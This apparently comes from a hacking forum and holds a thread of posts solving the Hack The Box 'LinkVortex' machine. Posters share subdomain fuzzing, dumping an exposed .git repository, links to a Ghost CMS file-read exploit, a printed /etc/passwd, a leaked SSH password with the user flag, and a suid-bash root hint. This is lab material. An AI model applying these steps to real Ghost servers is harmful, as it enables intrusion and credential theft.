HTB LinkVortex - Easy Linux
by cashiwoo - Saturday December 7, 2024 at 04:07 PM
#1
Starting thread for the box.

Quick OSINT regarding the machine name. Found Vortex Portal (as the box is easy it will definitely be some well known CVE). However, they are a bit old as for the HTB standards and the vulns are from 05' and were patched in 17'. Only other reoccurence I found is that  there may be a vulnerable 7z version embdeded into the platform usage.

Note: Those are just speculations ahead of the machine start. I'm eager to chat.

GL!

Links:
https://www.incibe.es/en/incibe-cert/ear...-2005-0879
https://cve.mitre.org/cgi-bin/cvename.cg...=2007-5842
https://www.exploit-db.com/exploits/25261
https://www.incibe.es/en/incibe-cert/ear...-2005-0879
https://nvd.nist.gov/vuln/detail/CVE-2007-3046
Reply
#2
ffuf -c -H "Host: FUZZ.linkvortex.htb" -u "http://linkvortex.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 230

dev [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 29ms]

http://dev.linkvortex.htb/.git/config

[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://github.com/TryGhost/Ghost.git
fetch = +refs/tags/v5.58.0:refs/tags/v5.58.0


Vulnerable to CVE-2024-23724 or CVE-2023-40028
Reply
#3
http://linkvortex.htb [200 OK] Apache, Country[RESERVED][ZZ], HTML5, HTTPServer[Apache], IP[10.10.11.47], JQuery[3.5.1], MetaGenerator[Ghost 5.58], Open-Graph-Protocol[website], PoweredBy[Ghost,a], Script[application/ld+json], Title[BitByBit Hardware], X-Powered-By[Express], X-UA-Compatible[IE=edge]

website is running Ghost CMS version 5.58
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#4
Dump git repo on dev subdomain with git-dumper.
Admin credentials for ghost are in authentication.test.js

This works with some adaptions
https://github.com/RhinoSecurityLabs/CVE...2024-23724
But no idea yet what's the point / how to get RCE from that
Reply
#5
https://github.com/0xyassine/CVE-2023-40028  - Look into this - edit the URL and work from there - if you have not found login yet:

Hidden Content
You must register or login to view this content.

YOU WILL LOG IN LIKE THIS:

file> /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin node:x:1000:1000::/home/node:/bin/bash
Reply
#6
(12-07-2024, 08:21 PM)StingEm Wrote: https://github.com/0xyassine/CVE-2023-40028  - Look into this - edit the URL and work from there - if you have not found login yet:



YOU WILL LOG IN LIKE THIS:

file> /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin node:x:1000:1000::/home/node:/bin/bash

Check the git repo again for the full path to the config file.
Use it to login with ssh and get the user flag.
Reply
#7
(12-07-2024, 08:23 PM)ritualist Wrote:
(12-07-2024, 08:21 PM)StingEm Wrote: https://github.com/0xyassine/CVE-2023-40028  - Look into this - edit the URL and work from there - if you have not found login yet:



YOU WILL LOG IN LIKE THIS:

file> /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin node:x:1000:1000::/home/node:/bin/bash

Check the git repo again for the full path to the config file.
Use it to login with ssh and get the user flag.

from where did you get the login cred?
Reply
#8
0000000000000000000000000000000000000000 299cdb4387763f850887275a716153e84793077d root <dev@linkvortex.htb> 1730322603 +0000 clone: from https://github.com/TryGhost/Ghost.git
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#9
Dockerfile.ghost has the path to the config file
Use https://github.com/0xyassine/CVE-2023-40028 to read it

For root you can either use chained symlinks to get the root flag / ssh key or just put your code for e.g. a suid bash in the CHECK_CONTENT variable.
Reply
#10
(12-07-2024, 08:23 PM)ritualist Wrote:
(12-07-2024, 08:21 PM)StingEm Wrote: https://github.com/0xyassine/CVE-2023-40028  - Look into this - edit the URL and work from there - if you have not found login yet:



YOU WILL LOG IN LIKE THIS:

file> /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin node:x:1000:1000::/home/node:/bin/bash

Check the git repo again for the full path to the config file.
Use it to login with ssh and get the user flag.

Thank you...
└─$ ssh bob@linkvortex.htb bob@linkvortex.htb's password: fibber-talented-worth bob@linkvortex:~$ ls user.txt bob@linkvortex:~$ cat user.txt 6e6acfb2b564ecec3c71c2963bb3cf85 bob@linkvortex:~$
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 90,898 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 4,365 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 9,528 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 2,351 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 2,649 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)